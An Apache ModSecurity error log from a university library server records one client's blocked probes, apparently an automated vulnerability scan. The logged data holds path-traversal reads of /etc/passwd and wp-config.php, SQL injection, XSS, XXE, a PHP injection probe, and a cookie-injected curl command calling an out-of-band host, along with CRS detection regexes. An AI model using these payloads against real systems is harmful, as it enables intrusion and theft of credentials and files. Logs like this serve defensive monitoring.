[Tue Aug 29 11:41:05.454803 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAAcvBe4AAAAJ"]
[Tue Aug 29 11:41:05.551545 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAAYf-NkAAAAD"]
[Tue Aug 29 11:41:08.367971 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAcYU-IAAAAp"]
[Tue Aug 29 11:41:09.587147 2023] [:error] [pid 1843] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAczXeYAAAAL"]
[Tue Aug 29 11:41:09.619441 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAcoNSIAAAAF"]
[Tue Aug 29 11:41:10.421967 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAActbH8AAAAH"]
[Tue Aug 29 11:41:10.423549 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAc4EjUAAAAP"]
[Tue Aug 29 11:41:13.360022 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAAc4EkUAAAAP"]
[Tue Aug 29 11:41:15.482374 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO1268Co-f0AAAaZ9pkAAAAo"]
[Tue Aug 29 11:41:18.627057 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAcoNVAAAAAF"]
[Tue Aug 29 11:41:18.676951 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO127sCo-f0AAAcbSEEAAAAv"]
[Tue Aug 29 11:41:19.356779 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAAc4EmMAAAAP"]
[Tue Aug 29 11:41:19.487855 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAActbLgAAAAH"]
[Tue Aug 29 11:41:19.887361 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAc0NcwAAAAM"]
[Tue Aug 29 11:41:20.606733 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAcqJMoAAAAG"]
[Tue Aug 29 11:41:20.742313 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAcyp4kAAAAK"]
[Tue Aug 29 11:41:20.784463 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAcyp4sAAAAK"]
[Tue Aug 29 11:41:21.711191 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128cCo-f0AAAc0Ne4AAAAM"]
[Tue Aug 29 11:41:21.967204 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26gmwity3atu8jft.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128cCo-f0AAAaZ9r0AAAAo"]
[Tue Aug 29 11:41:23.435003 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAc0NfgAAAAM"]
[Tue Aug 29 11:41:23.467583 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO1288Co-f0AAActbMQAAAAH"]
[Tue Aug 29 11:41:24.428358 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129MCo-f0AAAcbSFAAAAAv"]
[Tue Aug 29 11:41:24.455460 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAAQkBb4AAAAC"]
[Tue Aug 29 11:41:25.464297 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAaZ9s8AAAAo"]
[Tue Aug 29 11:41:25.487468 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAc0Nf8AAAAM"]
[Tue Aug 29 11:41:26.361203 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAUKhFwAAABC"]
[Tue Aug 29 11:41:26.380346 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAaZ9tcAAAAo"]
[Tue Aug 29 11:41:26.587884 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAaZ9tsAAAAo"]
[Tue Aug 29 11:41:26.697709 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAcbSGoAAAAv"]
[Tue Aug 29 11:41:27.615090 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAYf-TYAAAAD"]
[Tue Aug 29 11:41:28.403275 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g6odewzt6rnqoc.oast.site found within TX:1: cjmnbitjmimt14dgn26g6odewzt6rnqoc.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAQkBeEAAAAC"]
[Tue Aug 29 11:41:30.436147 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26gchhokknhkmyi9.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAcbSHwAAAAv"]
